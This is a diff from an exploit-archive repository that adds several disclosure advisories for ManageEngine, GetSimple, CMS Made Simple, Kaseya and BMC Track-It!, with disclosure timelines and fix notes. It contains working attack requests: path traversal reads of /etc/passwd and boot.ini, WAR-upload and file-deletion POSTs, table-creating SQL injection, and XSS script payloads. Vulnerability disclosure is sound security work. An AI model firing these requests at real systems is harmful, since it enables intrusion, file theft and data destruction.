Version 11.6 will be released with the patch.
These vulnerabilities remain UNFIXED in IT360.
================
Agile Information Security Limited
http://www.agileinfosec.co.uk/
>> Enabling secure digital business >>

67
exploits/multiple/webapps/43895.txt Normal file
View file

@ -0,0 +1,67 @@
>> Arbitrary file download in ManageEngine Netflow Analyzer and IT360
>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security
==========================================================================
Disclosure: 30/11/2014 / Last updated: 3/12/2014
>> Background on the affected product:
"NetFlow Analyzer, a complete traffic analytics tool, leverages flow technologies to provide real time visibility into the network bandwidth performance. NetFlow Analyzer, primarily a bandwidth monitoring tool, has been optimizing thousands of networks across the World by giving holistic view about their network bandwidth and traffic patterns. NetFlow Analyzer is a unified solution that collects, analyzes and reports about what your network bandwidth is being used for and by whom."
"Managing mission critical business applications is now made easy through ManageEngine IT360. With agentless monitoring methodology, monitor your applications, servers and databases with ease. Agentless monitoring of your business applications enables you high ROI and low TOC. With integrated network monitoring and bandwidth utilization, quickly troubleshoot any performance related issue with your network and assign issues automatically with ITIL based ServiceDesk integration."
This is being released as a 0-day because ManageEngine have been twiddling their thumbs (and making a fool out of me) for 105 days. See timeline below for explanation.
>> Technical details:
Vulnerability: Arbitrary file download
Constraints: unauthenticated in NetFlow; authenticated in IT360
Affected versions: NetFlow v8.6 to v10.2; at least IT360 v10.3 and above
CVE-2014-5445:
GET /netflow/servlet/CSVServlet?schFilePath=/etc/passwd
GET /netflow/servlet/CReportPDFServlet?schFilePath=C:\\boot.ini&pdf=true
CVE-2014-5446
GET /netflow/servlet/DisplayChartPDF?filename=../../../../boot.ini
All 3 servlets can be exploited in both Windows and Linux. A Metasploit module that exploits CVE-2014-5445 has been released.
>> Fix:
UNFIXED - ManageEngine failed to take action after 105 days.
Timeline of disclosure:
18/08/2014
- Requested contact via ManageEngine Security Response Center.
19/08/2014
- Received contact from the NetFlow Analyzer support team. Responded with the security advisory above detailing the vulnerabilities.
- Further back and forth explaining the vulnerabilities, how to exploit them and their impact.
22/08/2014
- Requested information regarding the release date for the fix. Received response "We do not have a ETA on this, I will check with our engineering team and update you."
22/09/2014
- Requested information regarding the release date for the fix. Received response "We expect that the new release will be within the next couple of weeks".
20/10/2014
- Requested information regarding the release date for the fix. Received response "Our new release will be happening early by next week, you can get the update in our NetFlow Analyzer website".
- Asked if they are sure that the fix will be included in the new release. Received response "yes you are correct, the issue that you have specified is fixed in new release".
27/10/2014
- NetFlow Analyzer version 10.2 released - still vulnerable.
- Sent an email to ManageEngine asking if they are going to release a fix soon. Received response "We will release the PPM file of the upgrade soon, in which we have fixed the Vulnerability you mentioned".
5/11/2014
- Requested information regarding the release date for the fix. Received response "You can expect the release before this month end".
28/11/2014
- Requested information regarding the release date for the fix. Received response "The PPM file is in testing phase and will be released in next Month".
- Asked if they can commit to a date. Received response "the ppm is in testing phase now, as it is one of the major release, we will not be able to give an exact date of release".
30/11/2014
- Realised that ManageEngine have been playing me for 105 days, and immediately released advisory and exploit.
================
Agile Information Security Limited
http://www.agileinfosec.co.uk/
>> Enabling secure digital business >>

94
exploits/multiple/webapps/43896.txt Normal file
View file

@ -0,0 +1,94 @@
>> Multiple vulnerabilities in ManageEngine OpManager, Social IT Plus and IT360
>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security
==========================================================================
Disclosure: 27/09/2014 (#1 and #2), 09/11/2014 (#3 and #4) / Last updated: 09/11/2014
>> Background on the affected products:
"ManageEngine OpManager is a network and data center infrastructure management software that helps large enterprises, service providers and SMEs manage their data centers and IT infrastructure efficiently and cost effectively. Automated workflows, intelligent alerting engines, configurable discovery rules, and extendable templates enable IT teams to setup a 24x7 monitoring system within hours of installation."
"Social IT Plus offers a cascading wall that helps IT folks to start discussions, share articles and videos easily and quickly. Other team members can access it and post comments and likes on the fly."
"Managing mission critical business applications is now made easy through ManageEngine IT360. With agentless monitoring methodology, monitor your applications, servers and databases with ease. Agentless monitoring of your business applications enables you high ROI and low TOC. With integrated network monitoring and bandwidth utilization, quickly troubleshoot any performance related issue with your network and assign issues automatically with ITIL based ServiceDesk integration."
>> Technical details:
#1
Vulnerability: Remote code execution via WAR file upload
Constraints: unauthenticated on OpManager and Social IT; authenticated in IT360
a)
CVE-2014-6034
POST /servlet/com.me.opmanager.extranet.remote.communication.fw.fe.FileCollector?regionID=../../../tomcat/webapps&FILENAME=payload.war
<... WAR file payload ...>
Affected versions: OpManager v8.8 to v11.4; Social IT Plus v11.0; IT360 v? to v10.4
A Metasploit module that exploits this vulnerability has been released.
b)
CVE-2014-6035
POST /servlets/FileCollector?AGENTKEY=123&FILENAME=../../../tomcat/webapps/warfile.war
<... WAR file payload ...>
Affected versions: OpManager v? to v11.4
#2
Vulnerability: Arbitrary file deletion
CVE-2014-6036
Constraints: unauthenticated on OpManager and Social IT; authenticated in IT360
Affected versions: OpManager v? to v11.4; Social IT Plus v11.0; IT360 v? to v10.3/10.4
POST /servlets/multipartRequest?customIcon=delete&fileName=../../../../boot.ini
#3
Vulnerability: Remote code execution via file upload
CVE-2014-7866
Constraints: unauthenticated on OpManager and Social IT; authenticated in IT360
a)
POST /servlet/MigrateLEEData?fileName=../tomcat/webapps/warfile.war%00
<... WAR file payload ...>
Affected versions: Unknown, at least OpManager v8 build 88XX to 11.4; IT360 10.3/10.4; Social IT 11.0
b)
POST /servlet/MigrateCentralData?operation=downloadFileFromProbe&zipFileName=../tomcat/webapps/warfile.war%00
<... WAR file payload ...>
Affected versions: Unknown, at least OpManager v8 build 88XX to 11.4; IT360 10.3/10.4; Social IT 11.0
#4
Vulnerability: Blind SQL injection
CVE-2014-7868
Constraints: unauthenticated on OpManager and Social IT; authenticated in IT360
a)
POST /servlet/APMBVHandler?OPERATION_TYPE=Delete&OPM_BVNAME=[SQLi]
POST /servlet/APMBVHandler?OPERATION_TYPE=Delete&OPM_BVNAME=aaa'%3bcreate+table+pulicia+(bolas+text)%3b--+
Affected versions: Unknown, at least the current versions (OpManager 11.3/11.4; IT360 10.3/10.4; Social IT 11.0)
b)
POST /servlet/DataComparisonServlet?operation=compare&numPrimaryKey=1337&query=[SQLi] --> runs direct query in db!
POST /servlet/DataComparisonServlet?operation=compare&numPrimaryKey=1337&query=create+table+panicia+(bolos+text)
Affected versions: Unknown, at least the current versions (OpManager 11.3/11.4; IT360 10.3/10.4; Social IT 11.0)
>> Fix:
Upgrade to OpManager 11.3 or 11.4, then install patches [A], [B] and [C].
This patch can be applied to all the applications but only for the latest version of each (OpManager 11.3/11.4, Social IT 11.0, IT360 10.4).
The fix will be included in OpManager version 11.5 which should be released sometime in late November or December 2014. No indication was given for when fixed versions of IT360 and Social IT Plus will be released.
[A] https://support.zoho.com/portal/manageengine/helpcenter/articles/servlet-vulnerability-fix
Resolves #1 and #2
[B] https://support.zoho.com/portal/manageengine/helpcenter/articles/sql-injection-vulnerability-fix
Resolves #3
[C] https://support.zoho.com/portal/manageengine/helpcenter/articles/fix-for-remote-code-execution-via-file-upload-vulnerability
Resolves #4
================
Agile Information Security Limited
http://www.agileinfosec.co.uk/
>> Enabling secure digital business >>

32
exploits/php/webapps/43888.txt Normal file
View file

@ -0,0 +1,32 @@
PoC for XSS bugs in the admin console of GetSimple CMS 3.3.1
CVE-2014-1603
by Pedro Ribeiro (pedrib@gmail.com) from Agile Information Security
Disclosure: 12/05/2014 / Last updated: 12/10/2014
Timeline:
04/11/2013 - Found bugs, produced proof of concept.
05/11/2013 - Communicated to the developer, which acknowledged receipt.
10/01/2014 - Politely asked the developer for progress, no response.
17/01/2014 - Received CVE number from MITRE.
20/01/2014 - Communicated CVE number to the developer, no response.
29/01/2014 - Politely asked the developer for progress, no response.
12/05/2014 - Public release.
==============================
Reflected XSS in plugin load page:
http://192.168.56.101/getsimple/admin/load.php?id=anonymous_data&param="><script>alert(1)</script>
Persistent XSS in settings page:
<form name="input" action="http://192.168.56.101/getsimple/admin/settings.php" method="post">
<input type="text" name="user" value=""><script>alert(1);</script>">
<input type="text" name="email" value=""><script>alert(2);</script>">
<input type="text" name="name" value=""><script>alert(3);</script>">
<input type="hidden" name="submitted" value="Save Settings">
<input type="submit" value="Submit">
</form>
================
Agile Information Security Limited
http://www.agileinfosec.co.uk/
>> Enabling secure digital business >>

278
exploits/php/webapps/43889.txt Normal file
View file

@ -0,0 +1,278 @@
> Vulnerabilities in CMS Made Simple, version 1.11.9
> Discovered by Pedro Ribeiro (pedrib@gmail.com) of Agile Information Security
> Reported to ted@cmsmadesimple.org and calguy1000@cmsmadesimple.org
Disclosure: 28/02/2014 / Last updated: 12/10/2014
CMS Made Simple, an open source content management system, allows for faster and easier management of website content. This CMS is scalable for small businesses to large corporations.
TL;DR:
XSS in admin console, weak CSRF protection and a possible PHP object insertion via unserialize.
These vulnerabilities were considered unimportant by the CMS Made Simple developers. Their reasoning was that they had to be exploited by a logged in administrator user who is a trusted user anyway. When I explained to them that with XSS all you need to do is send a malicious link to the administrator, they responded back saying that they are confident in their CSRF protection. I then sent them an analysis of their CSRF protection (at the bottom of this advisory), which I found to be quite weak. Finally they commited to implement a half-assed mitigation for the CSRF token weakness but said they will not fix the other issues.
Timeline:
- 27.11.2013: Initial contact to the emails listed in www.cmsmadesimple.com. No reply.
- 03.12.2013: Message posted in the www.cmsmadesimple.com public forum asking to contact me back. A few hours later I was contacted by calguy and sent him a more complete version of this advisory with recommendations.
- 09.12.2013: calguy responds saying these will not be fixed as you have to be an admin user anyway.
- 13.12.2013: After a few days arguing over email, Robert Campbell, CMS Made Simple project manager, responds with an official note saying they will double the CSRF token length in a future release but will not fix the rest of the issues.
- 14.12.2013: Handed over to CERT asking for help to try to reason with the CMS Made Simple developers.
- 28.02.2014: Public disclosure by CERT
====================================================================
Vulnerability: Persistent cross site scripting (XSS) in add* pages (CVE-2014-0334)
File(line): cmsmadesimple/admin/addgroup.php(107)
File(line): cmsmadesimple/admin/addhtmlblob.php(165)
File(line): cmsmadesimple/admin/addbookmark.php(92/96)
Code snippet:
addgroup.php:
$group= "";
if (isset($_POST["group"])) $group = $_POST["group"];
...
<div class="pageoverflow">
<p class="pagetext">*<?php echo lang('name')?>:</p>
<p class="pageinput"><input type="text" name="group" maxlength="255" value="<?php echo $group?>" /></p>
addhtmlblob.php:
$htmlblob = "";
if (isset($_POST['htmlblob'])) $htmlblob = trim($_POST['htmlblob']);
...
<div class="pageoverflow">
<p class="pagetext">*<?php echo lang('name') .' '. lang('gcb_name_help')?>:</p>
<p class="pageinput"><input type="text" name="htmlblob" maxlength="255" value="<?php echo $htmlblob?>" class="standard" /></p>
</div>
addbookmark.php:
$title= "";
if (isset($_POST["title"])) $title = $_POST["title"];
$url = "";
if (isset($_POST["url"])) $url = $_POST["url"];
...
<input type="hidden" name="<?php echo CMS_SECURE_PARAM_NAME ?>" value="<?php echo $_SESSION[CMS_USER_KEY] ?>" />
</div>
<div class="pageoverflow">
<p class="pagetext"><?php echo lang('title')?>:</p>
<p class="pageinput"><input type="text" name="title" maxlength="255" value="<?php echo $title?>" /></p>
</div>
<div class="pageoverflow">
<p class="pagetext"><?php echo lang('url')?>:</p>
<p class="pageinput"><input type="text" name="url" size="50" maxlength="255" value="<?php echo $url ?>" class="standard" /></p>
</div>
Comment:
addgroup.php: "group" parameter is written directly onto the page without validation.
addhtmlblob.php: "htmlblob" parameter is written directly onto the page without validation.
addbookmark.php: "title" and "url" parameters are written directly onto the page without validation.
Proof-of-concept:
addgroup.php: (POST) _sx_=39d304b1&group=<script>alert(2)</script>&active=on&addgroup=true
addhtmlblob.php: (POST) _sx_=39d304b1&htmlblob=%22%3E%3Cscript%3Ealert%282%29%3C%2Fscript%3E&use_wysiwyg=0&use_wysiwyg=1&content=asas&description=ddd&addhtmlblob=true&submit2=Submit
addbookmark.php: (POST) title="><script>alert(1)</script>&url="><script>alert(2)</script>&addbookmark=true
NOTE: this will also cause XSS in the respective list* pages.
====================================================================
Vulnerability: Persistent cross site scripting (XSS) in copy* pages (CVE-2014-0334)
File(line): cmsmadesimple/admin/copystylesheet.php(117)
File(line): cmsmadesimple/admin/copytemplate.php(160)
Code snippet:
copystylesheet.php:
$stylesheet_name = '';
if (isset($_REQUEST["stylesheet_name"])) { $stylesheet_name = $_REQUEST["stylesheet_name"]; }
...
<div class="pageoverflow">
<p class="pagetext"><?php echo lang('stylesheet'); ?>:</p>
<p class="pageinput"><?php echo $stylesheet_name; ?></p>
</div>
copytemplate.php:
<div class="pageoverflow">
<p class="pagetext"><?php echo lang('template'); ?>:</p>
<p class="pageinput"><?php echo $template_name; ?></p>
</div>
Comment:
copystylesheet.php: "stylesheet_name" parameter is written directly onto the page without validation.
copytemplate.php: "template_name" parameter is written directly onto the page without validation.
Proof-of-concept:
copystylesheet.php: (POST) _sx_=39d304b1&stylesheet=%22%3E%3Cscript%3Ealert%285%29%3C%2Fscript%3E&stylesheet_id=32&copystylesheet=true
copytemplate.php: (POST) _sx_=39d304b1&template=%22%3E%3Cscript%3Ealert%2825%29%3C%2Fscript%3E&template_id=15&copytemplate=true&from=listtemplates.php%3F_sx_%3D39d304b1
NOTE: this will also cause XSS in the respective list* pages.
====================================================================
Vulnerability: Persistent cross site scripting (XSS) in list* pages (CVE-2014-0334)
File(line): cmsmadesimple/admin/addtemplate.php(117)
File(line): cmsmadesimple/admin/listtemplates.php(188)
File(line): cmsmadesimple/admin/addcss.php(65-156)
File(line): cmsmadesimple/admin/listcss.php(172)
Code snippet:
addtemplate.php:
$template = "";
if (isset($_POST["template"])) $template = $_POST["template"];
...
audit($newtemplate->id, 'HTML-template: '.$template, 'Added');
listtemplates.php:
if ($counter < $page*$limit && $counter >= ($page*$limit)-$limit) {
echo "<tr class=\"$currow\">\n"; | template name shown below
echo "<td><a href=\"edittemplate.php".$urlext."&template_id=".$onetemplate->id."\">".$onetemplate->name."</a></td>\n";
echo "<td class=\"pagepos\">".($onetemplate->default == 1?$default_true:$default_false)."</td>\n";
addcss.php:
# then its name
$css_name = "";
if (isset($_POST["css_name"])) $css_name = $_POST["css_name"];
// Now clean up name
$css_name = htmlspecialchars($css_name, ENT_QUOTES);
^ HTML encoded here, but stored in the database
...
$newstylesheet->name = $css_name;
...
$result = $newstylesheet->Save();
listcss.php:
// if user has right to delete
if ($delcss)
{
echo "<td class=\"icons_wide\"><a href=\"deletecss.php".$urlext."&css_id=".$one["css_id"]."\" onclick=\"return confirm('".cms_html_entity_decode_utf8(lang('deleteconfirm', $one['css_name']),true)."');\">"; <--- HTML decoded here
echo $themeObject->DisplayImage('icons/system/delete.gif', lang('delete'),'','','systemicon');
echo "</a></td>\n";
}
Comment:
addtemplate.php: The "template" parameter is encoded properly in addtemplate.php, but stored in the database and displayed as part of HTML output in listtemplates.php.
addcss.php: The "css_name" parameter is encoded properly in addcss.php, but stored in the database and displayed as part of HTML output in listcss.php.
Proof-of-concept:
addtemplate.php: (POST) template=%22%3E%3Cscript%3Ealert%2822%29%3C%2Fscript%3E&content=%7Bprocess_pagedata%7D%3C%21DOCTYPE+html+PUBLIC+%22-%2F%2FW3C%2F%2FDTD+XHTML+1.0+Transitional%2F%2FEN%22+%22http%3A%2F%2Fwww.w3.org%2FTR%2Fxhtml1%2FDTD%2Fxhtml1-transitional.dtd%22%3E%0D%0A%3Chtml+xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F1999%2Fxhtml%22+xml%3Alang%3D%22en%22+%3E%0D%0A%3Chead%3E%0D%0A%3Ctitle%3E%7Bsitename%7D+-+%7Btitle%7D%3C%2Ftitle%3E%0D%0A%7Bmetadata%7D%0D%0A%7Bcms_stylesheet%7D%0D%0A%3C%2Fhead%3E%0D%0A%3Cbody%3E%0D%0A%0D%0A%3C%21--+start+header+--%3E%0D%0A%3Cdiv+id%3D%22header%22%3E%0D%0A++%3Ch1%3E%7Bsitename%7D%3C%2Fh1%3E%0D%0A%3C%2Fdiv%3E%0D%0A%3C%21--+end+header+--%3E%0D%0A%0D%0A%3C%21--+start+menu+--%3E%0D%0A%3Cdiv+id%3D%22menu%22%3E%0D%0A++%7Bmenu%7D%0D%0A%3C%2Fdiv%3E%0D%0A%3C%21--+end+menu+--%3E%0D%0A%0D%0A%3C%21--+start+content+--%3E%0D%0A%3Cdiv+id%3D%22content%22%3E%0D%0A++%3Ch1%3E%7Btitle%7D%3C%2Fh1%3E%0D%0A++%7Bcontent%7D%0D%0A%3C%2Fdiv%3E%0D%0A%3C%21--+end+content+--%3E%0D%0A%0D%0A%3C%2Fbody%3E%0D%0A%3C%2Fhtml%3E%0D%0A&active=on&addtemplate=true&submit=Submit
listcss.php: (POST) css_name="><script>alert(1)</script>&css_text=b&media_query=c&addcss=true
====================================================================
Vulnerability: Persistent cross site scripting (XSS) in edit* pages (CVE-2014-0334)
File(line): cmsmadesimple/admin/editbookmark.php(117/121)
Important note: due to lack of time I could not test the other edit* pages, but looking at the code quickly they seem vulnerable.
I suspect the following are also vulnerable:
editcontent.php
editcss.php
editevent.php
editgroup.php
edithtmlblob.php
edittemplate.php
edituser.php
edituserplugin.php
Code snippet:
editbookmark.php:
$title = "";
if (isset($_POST["title"])) $title = $_POST["title"];
$myurl = "";
if (isset($_POST["url"])) $myurl = $_POST["url"];
...
<div class="pageoverflow">
<p class="pagetext"><?php echo lang('title')?>:</p>
<p class="pageinput"><input type="text" name="title" maxlength="255" value="<?php echo $title?>" /></p>
</div>
<div class="pageoverflow">
<p class="pagetext"><?php echo lang('url')?>:</p>
<p class="pageinput"><input type="text" name="url" size="80" maxlength="255" value="<?php echo $myurl ?>" /></p>
</div>
Comment:
editbookmark.php: "title" and "url" parameters are written directly onto the page without validation.
Proof-of-concept:
editbookmark.php: (POST) _sx_=39d304b1&title="><script>alert(99)</script>&url="><script>alert(999)</script>&bookmark_id=6&editbookmark=true&userid=1
NOTE: this will also cause XSS in the respective list* pages.
====================================================================
Vulnerability: Reflected cross site scripting (XSS) in message parameter (CVE-2014-0334)
File(line): cmsmadesimple/admin/listcss.php(61)
File(line): cmsmadesimple/admin/listtemplates.php(49)
File(line): cmsmadesimple/admin/listusers.php(42)
File(line): cmsmadesimple/admin/listhtmlblobs.php(45)
File(line): cmsmadesimple/admin/listcssassoc.php(167)
File(line): cmsmadesimple/admin/templatecss.php(107)
Code snippet:
(from listcss.php)
#******************************************************************************
# first : displaying error message, if any.
#******************************************************************************
if (isset($_GET["message"])) {
$message = preg_replace('/\</','',$_GET['message']);
echo '<div class="pagemcontainer"><p class="pagemessage">'.$message.'</p></div>';
Comment:
Could not exploit the "message" param properly, as the regex strips the "<". Might be doable by someone smarter that knows how to play with encodings properly?
Proof-of-concept:
(GET) http://192.168.56.101/cmsmadesimple/admin/listcss.php?_sx_=39d304b1&message=%22%3E%3Cscript%3Ealert%281%29%3C/script%3E
======================================================================
Vulnerability: Cross Site Request Forgery
File(line): application wide
Comment:
The application contains a weak CSRF protection. The CSRF token is called "user key" and is named "_sx_", and is attributed to a user per session.
- Tokens are included in the URL in HTTP GET requests
- Tokens are also included in many Referral headers upon redirect, making them accessible to JavaScript
- Tokens are only 8 characters long (and alphanumeric only), meaning they are easy to bruteforce
- Getting a token wrong does not seem to kill the user session, making bruteforce feasible
NOTE: Version 1.11.10 doubles the character length to 16 characters which helps with bruteforce. However the application still leaks the CSRF tokens where it shouldn't, allowing them to be easily extracted in combination wit the XSS flaws.
References:
https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29_Prevention_Cheat_Sheet
====================================================================
Vulnerability: PHP Object Insertion
File(line): cmsmadesimple/admin/changegroupperm.php(115)
Code snippet:
$selected_groups = unserialize(base64_decode($_POST['sel_groups']));
$query = 'DELETE FROM '.cms_db_prefix().'group_perms
WHERE group_id IN ('.implode(',',$selected_groups).')';
$db->Execute($query);
Comment:
User input is passed directly into unserialize().
Low risk as currently there are no exploitable methods in CMS Made Simple core. Worth keeping an eye on as they are not going to fix it anytime soon, or trail through the dozens of available plugins to see if there's an exploitable method there.
References:
https://www.owasp.org/index.php/PHP_Object_Injection
http://www.alertlogic.com/writing-exploits-for-exotic-bug-classes/
http://www.suspekt.org/downloads/POC2009-ShockingNewsInPHPExploitation.pdf
http://vagosec.org/2013/12/wordpress-rce-exploit/
================
Agile Information Security Limited
http://www.agileinfosec.co.uk/
>> Enabling secure digital business >>

40
exploits/windows/webapps/37621.txt
View file

@ -1,43 +1,32 @@
tl;dr
Two vulns in Kaseya Virtual System Administrator - an authenticated
arbitrary file download and two lame open redirects.
Full advisory text below and at [1]. Thanks to CERT for helping me to
disclose these vulnerabilities [2].
>> Multiple vulnerabilities in Kaseya Virtual System Administrator
>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security (http://www.agileinfosec.co.uk/)
==========================================================================
Disclosure: 13/07/2015 / Last updated: 13/07/2015
Disclosure: 13/07/2015 / Last updated: 28/09/2015
>> Background on the affected product:
"Kaseya VSA is an integrated IT Systems Management platform that can
be leveraged seamlessly across IT disciplines to streamline and
automate your IT services. Kaseya VSA integrates key management
capabilities into a single platform. Kaseya VSA makes your IT staff
more productive, your services more reliable, your systems more
secure, and your value easier to show."
"Kaseya VSA is an integrated IT Systems Management platform that can be leveraged seamlessly across IT disciplines to streamline and automate your IT services. Kaseya VSA integrates key management capabilities into a single platform. Kaseya VSA makes your IT staff more productive, your services more reliable, your systems more secure, and your value easier to show."
A special thanks to CERT and ZDI for assisting with the vulnerability reporting process.
These vulnerabilities were disclosed by CERT under ID 919604 [1] on 13/07/2015.
>> Technical details:
#1
Vulnerability: Arbitary file download (authenticated)
Affected versions: unknown, at least v9
CVE-2015-2862 / CERT ID 919604
Affected versions: unknown, at least v7 to v9.1
GET /vsaPres/web20/core/Downloader.ashx?displayName=whatever&filepath=../../boot.ini
Referer: http://10.0.0.3/
A valid login is needed, and the Referrer header must be included. A
sample request can be obtained by downloading any file attached to any
ticket, and then modifying it with the appropriate path traversal.
This will download the C:\boot.ini file when Kaseya is installed in
the default C:\Kaseya directory. The file download root is the
WebPages directory (<Kaseya_Install_Dir>\WebPages\).
A valid login is needed, and the Referrer header must be included. A sample request can be obtained by downloading any file attached to any ticket, and then modifying it with the appropriate path traversal.
This will download the C:\boot.ini file when Kaseya is installed in the default C:\Kaseya directory. The file download root is the WebPages directory (<Kaseya_Install_Dir>\WebPages\).
#2
Vulnerability: Open redirect (unauthenticated)
Affected versions: unknown, at least v7 to XXX
CVE-2015-2863 / CERT ID 919604
Affected versions: unknown, at least v7 to v9.1
a)
http://192.168.56.101/inc/supportLoad.asp?urlToLoad=http://www.google.com
@ -54,10 +43,11 @@ R9.0: install patch 9.0.0.14
R8.0: install patch 8.0.0.18
V7.0: install patch 7.0.0.29
>> References:
[1] https://www.kb.cert.org/vuls/id/919604
================
Agile Information Security Limited
http://www.agileinfosec.co.uk/
>> Enabling secure digital business >>
[1] https://raw.githubusercontent.com/pedrib/PoC/master/generic/kaseya-vsa-vuln.txt
[2] https://www.kb.cert.org/vuls/id/919604

93
exploits/windows/webapps/43883.txt Normal file
View file

@ -0,0 +1,93 @@
>> Multiple critical vulnerabilities in BMC Track-It! 11.4
>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security
=================================================================================
Disclosure: 04/07/2016 / Last updated: 01/01/2017
>> Background and summary
BMC Track-It! exposes several .NET remoting services on port 9010. .NET remoting is a remote method technology similar to Java RMI or CORBA which allows you to invoke methods remotely and retrieve their result.
These remote methods are used when a technician uses the Track-It! client console to communicate with the central Track-It! server. A technician would invoke these methods for obtaining tickets, creating a new ticket, uploading files to tickets, etc.
On October 2014, two 0 day vulnerabilities for Track-It! 11.3 were disclosed (under CVE-2014-4872, see [1]). The vulnerabilities were due
to the Track-It! server accepting remote method invocations without any kind of authentication or encryption. The vulnerabilities were very severe: one allowed an attacker to execute code on the server as NETWORK SERVICE or SYSTEM, while the other would allow an attacker to obtain the domain administrator and SQL server passwords if the Track-It! server had password reset turned on.
These vulnerabilities were discovered in a trivial manner - simply by turning Wireshark on and observing the packets one could see the remote method invocations and objects being passed around. Duplicate and even triplicate packets would not be rejected by the server, which would execute whatever action was requested in the packet.
Disclosure was done by the US-CERT, which attempted to contact BMC but received no response after 45 days. After this period they released the vulnerability information and I released two Metasploit exploits.
BMC contacted me asking for advice on how to fix the issues, to which I responded:
"For #1 [file upload] and #2 [domain admin pass disclosure] the fix is to implement authentication and authorisation. There is no other way to fix it.
[...] Make sure the auth is done properly. You will have to negotiate some kind of session key using the user's credential at the start and use that session key for encryption going forward. Do not use a fixed key, as this can be reverse engineered.
If you don't implement such mechanism, it's just a question of time before someone else breaks your protection and finds new vulnerabilities."
On December 9th 2014, BMC released Track-It! 11.4 [2], which they claimed had fixed the security vulnerabilities.
At first glance, this seemed to be true. Traffic in Wireshark did seem to be encrypted. However upon further inspection, it became obvious that while the actual method invocation and its arguments were being encrypted using a DES key, there was still no authentication being done.
What this means in practice is that anyone can negotiate a new encryption key with the server and use that from then on to invoke remote methods without ever authenticating to the server, even for the initial encryption key exchange.
The code can be inspected by decompiling TrackIt.Utility.Common.dll. The interesting part is in:
namespace TrackIt.Utility.Common.Remoting
{
internal enum SecureTransaction
{
Uninitialized,
SendingPublicKey,
SendingSharedKey,
SendingEncryptedMessage,
SendingEncryptedResult,
UnknownIdentifier,
UnauthenticatedClient
}
}
This represents the state machine that the server uses to track client requests. The initial state is UnauthenticatedClient for any unknown client. A typical communication would be as follows:
1- Client generates a RSA key, which it shares with the server by sending a Modulus and an Exponent.
2- Server creates a DES key and sends that key back to the client
3- Client and server now share an encryption key; that key is used to pass back messages back and forth (states SendingEncryptedMessage and SendingEncryptedResult).
As it is evident, at no point there is any authentication or credentials being passed from the client to the server. So while all traffic is encrypted, anyone can negotiate an encryption key with the server and invoke any remote method.
From here on, building an exploit is trivial. All that is needed is to import the library DLL's from the Track-It! client application and invoke the methods in the code.
A special thanks to SecuriTeam Secure Disclosure (SSD), which have assisted me in disclosing this vulnerability to BMC. Their advisory can be found at https://blogs.securiteam.com/index.php/archives/2713.
Exploit code for this vulnerability has been released, and can be found in the same github repository as this advisory [3].
>> Technical details:
#1
Vulnerability: Remote code execution via file upload
CVE-2016-6598
Attack Vector: Remote
Constraints: None; exploitable by an unauthenticated attacker
Affected versions: 11.4 (versions <= 11.3 are affected by CVE-2014-4872, which is very similar)
The application exposes an unauthenticated .NET remoting file storage service (FileStorageService) on port 9010.
This service contains a method that allows uploading a file to an arbitrary path on the machine that is running Track-It!. This can be used to upload a file to the web root and achieve code execution as NETWORK SERVICE or SYSTEM.
#2
Vulnerability: Domain administrator and SQL server user credentials disclosure
CVE-2016-6599
Attack Vector: Remote
Constraints: None; exploitable by an unauthenticated attacker
Affected versions: 11.4 (versions <= 11.3 are affected by CVE-2014-4872, which is very similar)
The application exposes an unauthenticated .NET remoting configuration service (ConfigurationService) on port 9010.
This service contains a method that can be used to retrieve a configuration file that contains the application database name, username and password as well as the domain administrator username and password. These are encrypted with a fixed key and IV ("NumaraIT") using the DES algorithm. The domain administrator username and password can only be obtained if the Self-Service component is enabled, which is the most common scenario in enterprise deployments.
>> Fix:
Upgrade to BMC Track-It! 11.5 or above.
>> References:
[1] https://raw.githubusercontent.com/pedrib/PoC/master/advisories/bmc-track-it-11.3.txt
[2] https://communities.bmc.com/community/bmcdn/bmc_track-it/blog/2014/12/09/track-it-114-is-now-available
[3] https://github.com/pedrib/PoC/tree/master/exploits/TrackPwn (EDB Mirror: //github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/43883.zip)
================
Agile Information Security Limited
http://www.agileinfosec.co.uk/
>> Enabling secure digital business >>

101
files_exploits.csv
View file

@ -643,7 +643,7 @@ id,file,description,date,author,type,platform,port
4379,exploits/windows/dos/4379.html,"Microsoft SQL Server - Distributed Management Objects 'sqldmo.dll' Buffer Overflow (PoC)",2007-09-08,rgod,dos,windows,
4403,exploits/windows/dos/4403.py,"JetCast Server 2.0.0.4308 - Remote Denial of Service",2007-09-13,vCore,dos,windows,
4409,exploits/windows/dos/4409.html,"HP - ActiveX 'hpqutil.dll' ListFiles Remote Heap Overflow (PoC)",2007-09-14,GOODFELLAS,dos,windows,
4426,exploits/hardware/dos/4426.pl,"Airsensor M520 - HTTPD Unauthenticated Remote Denial of Service / Buffer Overflow (PoC)",2007-09-18,"Alex Hernandez",dos,hardware,
4426,exploits/hardware/dos/4426.pl,"Airsensor M520 - HTTPd Unauthenticated Remote Denial of Service / Buffer Overflow (PoC)",2007-09-18,"Alex Hernandez",dos,hardware,
4432,exploits/multiple/dos/4432.html,"Sun jre1.6.0_X - isInstalled.dnsResolve Function Overflow",2007-09-19,"YAG KOHHA",dos,multiple,
4474,exploits/windows/dos/4474.html,"EDraw Office Viewer Component 5.3 - 'FtpDownloadFile()' Remote Buffer Overflow",2007-10-01,shinnai,dos,windows,
4479,exploits/windows/dos/4479.html,"CyberLink PowerDVD - CreateNewFile Remote Rewrite Denial of Service",2007-10-01,rgod,dos,windows,
@ -786,7 +786,7 @@ id,file,description,date,author,type,platform,port
6372,exploits/windows/dos/6372.html,"Google Chrome 0.2.149.27 - A HREF Denial of Service",2008-09-05,Shinnok,dos,windows,
6386,exploits/windows/dos/6386.html,"Google Chrome 0.2.149.27 - Inspect Element Denial of Service",2008-09-05,Metacortex,dos,windows,
6391,exploits/windows/dos/6391.html,"Flock Social Web Browser 1.2.5 - 'loop' Remote Denial of Service",2008-09-06,LiquidWorm,dos,windows,
6394,exploits/hardware/dos/6394.pl,"Samsung DVR SHR2040 - HTTPD Remote Denial of Service Denial of Service (PoC)",2008-09-07,"Alex Hernandez",dos,hardware,
